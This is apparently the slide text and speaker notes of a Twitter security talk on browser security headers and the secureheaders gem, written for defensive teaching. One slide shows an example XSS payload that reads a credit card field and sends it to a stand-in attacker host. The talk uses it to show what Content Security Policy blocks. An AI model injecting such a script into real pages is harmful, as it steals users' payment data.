Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application
11. Do you use these?
Content security policy
X-Frame-Options
HTTP Strict Transport Security
X-Xss-Protection
X-Content-Type-Options
@ocrails | @ndm
12. X-ContentType-Options
Fixes mime sniffing attacks
Only applies to IE, because only IE would
do something like this
X-Content-Type-Options = ‘nosniff’
zzzzZZZZZZzzzzz
@ocrails | @ndm
13. X-Xss-Protection
Use the browser’s built in XSS Auditor
X-Xss-Protection: [0-1](; mode=block)?
X-Xss-Protection: 1; mode=block
(SCREENSHOT OF BLOCKED SCRIPT)
zzzzZZZ... huh? zzzzzzzz
@ocrails | @ndm
14. X-Frame-Options
Protects you from most classes of
Clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW FROM
example.com
zzz... oh hey thats cool. Don’t frame my stuff.
@ocrails | @ndm
16. Firesheep/SSL Strip
Given I don’t haven’t received an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned
@ocrails | @ndm
17. Other ssl fails
Posting passwords over HTTP
Loading mixed content
Using protocol relative URLS
@ocrails | @ndm
19. How hard is it to use?
Base Case
Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains
(SSL FOR DUMMIES PICTURE)
@ocrails | @ndm
20. Content secur-a-wat?
Content security policy is reshaping the security model
It is a complicated spec with great differences across browsers
It is not widely adopted
However,
It completely eliminates reflected and stored XSS
It ensures that you never load mixed content
It can protect users with infected browsers
It allows you to accept arbitrary html code from users
@ocrails | @ndm
22. QuickTime™ and a
H.264 decompressor
are needed to see this picture.
@owaspoc Jan 2013
@ndm | @presidentbeef
23. Get rid of XSS, eh?
A script-src directive that doesn’t contain ‘unsafe-inline’ almost
eliminates most forms of cross site scripting.
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
@ocrails | @ndm
25. But I have to...
OK, then I’ll inject:
<script>
var image = new Image();
image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();
</script>
FALSE! img-src violation, no XHR allowed
@owaspoc Jan 2013
@ndm | @presidentbeef
29. How to apply?
Secure headers!
Open sourced earlier this month
https://github.com/twitter/secureheaders
@ocrails | @ndm
30. How does it work?
It sets a before_filter that applies each header
Values are based on options passed to filter, or in an initializer
Easily overridden
Secure by default!!!
@ocrails | @ndm
31. What about that security policy thingy
There are > 6 differences between these two header values
@ocrails | @ndm
33. Long hair don’t care
About browser inconsistencies
@ocrails | @ndm
34. Other features
Set separate policies for http/https
Autofill chrome-extension: (becoming part of spec)
Auto fill missing directives with default value (becoming part of the spec)
@ocrails | @ndm
35. You mean there’s more on CSP?
The browser sends reports!
@ocrails | @ndm
36. What does the report look like?
{
"csp-report"=> {
"document-uri"=>"http://localhost:3000/home",
"referrer"=>"",
"blocked-uri"=>"ws://localhost:35729/livereload",
"violated-directive"=>"xhr-src ws://localhost.twitter.com:*"
}
}
@ocrails | @ndm
37. Quiz: what does this report indicate?
{
"csp-report"=> {
"document-uri"=>"http://example.com/welcome",
"referrer"=>"",
"blocked-uri"=>"self",
"violated-directive"=>"inline script base restriction",
"source-file"=>"http://example.com/welcome",
"script-sample"=>"alert(1)",
"line-number"=>81
}
}
@ocrails | @ndm
38. Header gem to the rescue
It forwards CSP reports for Firefox
It makes setting an enforce and report only mode easy for
experimentation
@ocrails | @ndm
Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
Talk about http basic authorization
Many of these headers not encourage best practices while providing a better user experience and saving resources
Take a survey
save resources since nothing is framed
Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
hsts preload and max-age
Explain how redirecting to https doesn’t protect the initial request Save round trip
Explain mixed content: MITM assets Firesheep Cookies sent Supported in webkit (phantomjs) accept arbitrary and safe because inserted scripts won’t execute on* events javascript uris restrict using eval
A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful xss attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and a by a variety of one-off methods.
strings or hashes
Yeah, some browsers protect you, but not all support it
Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.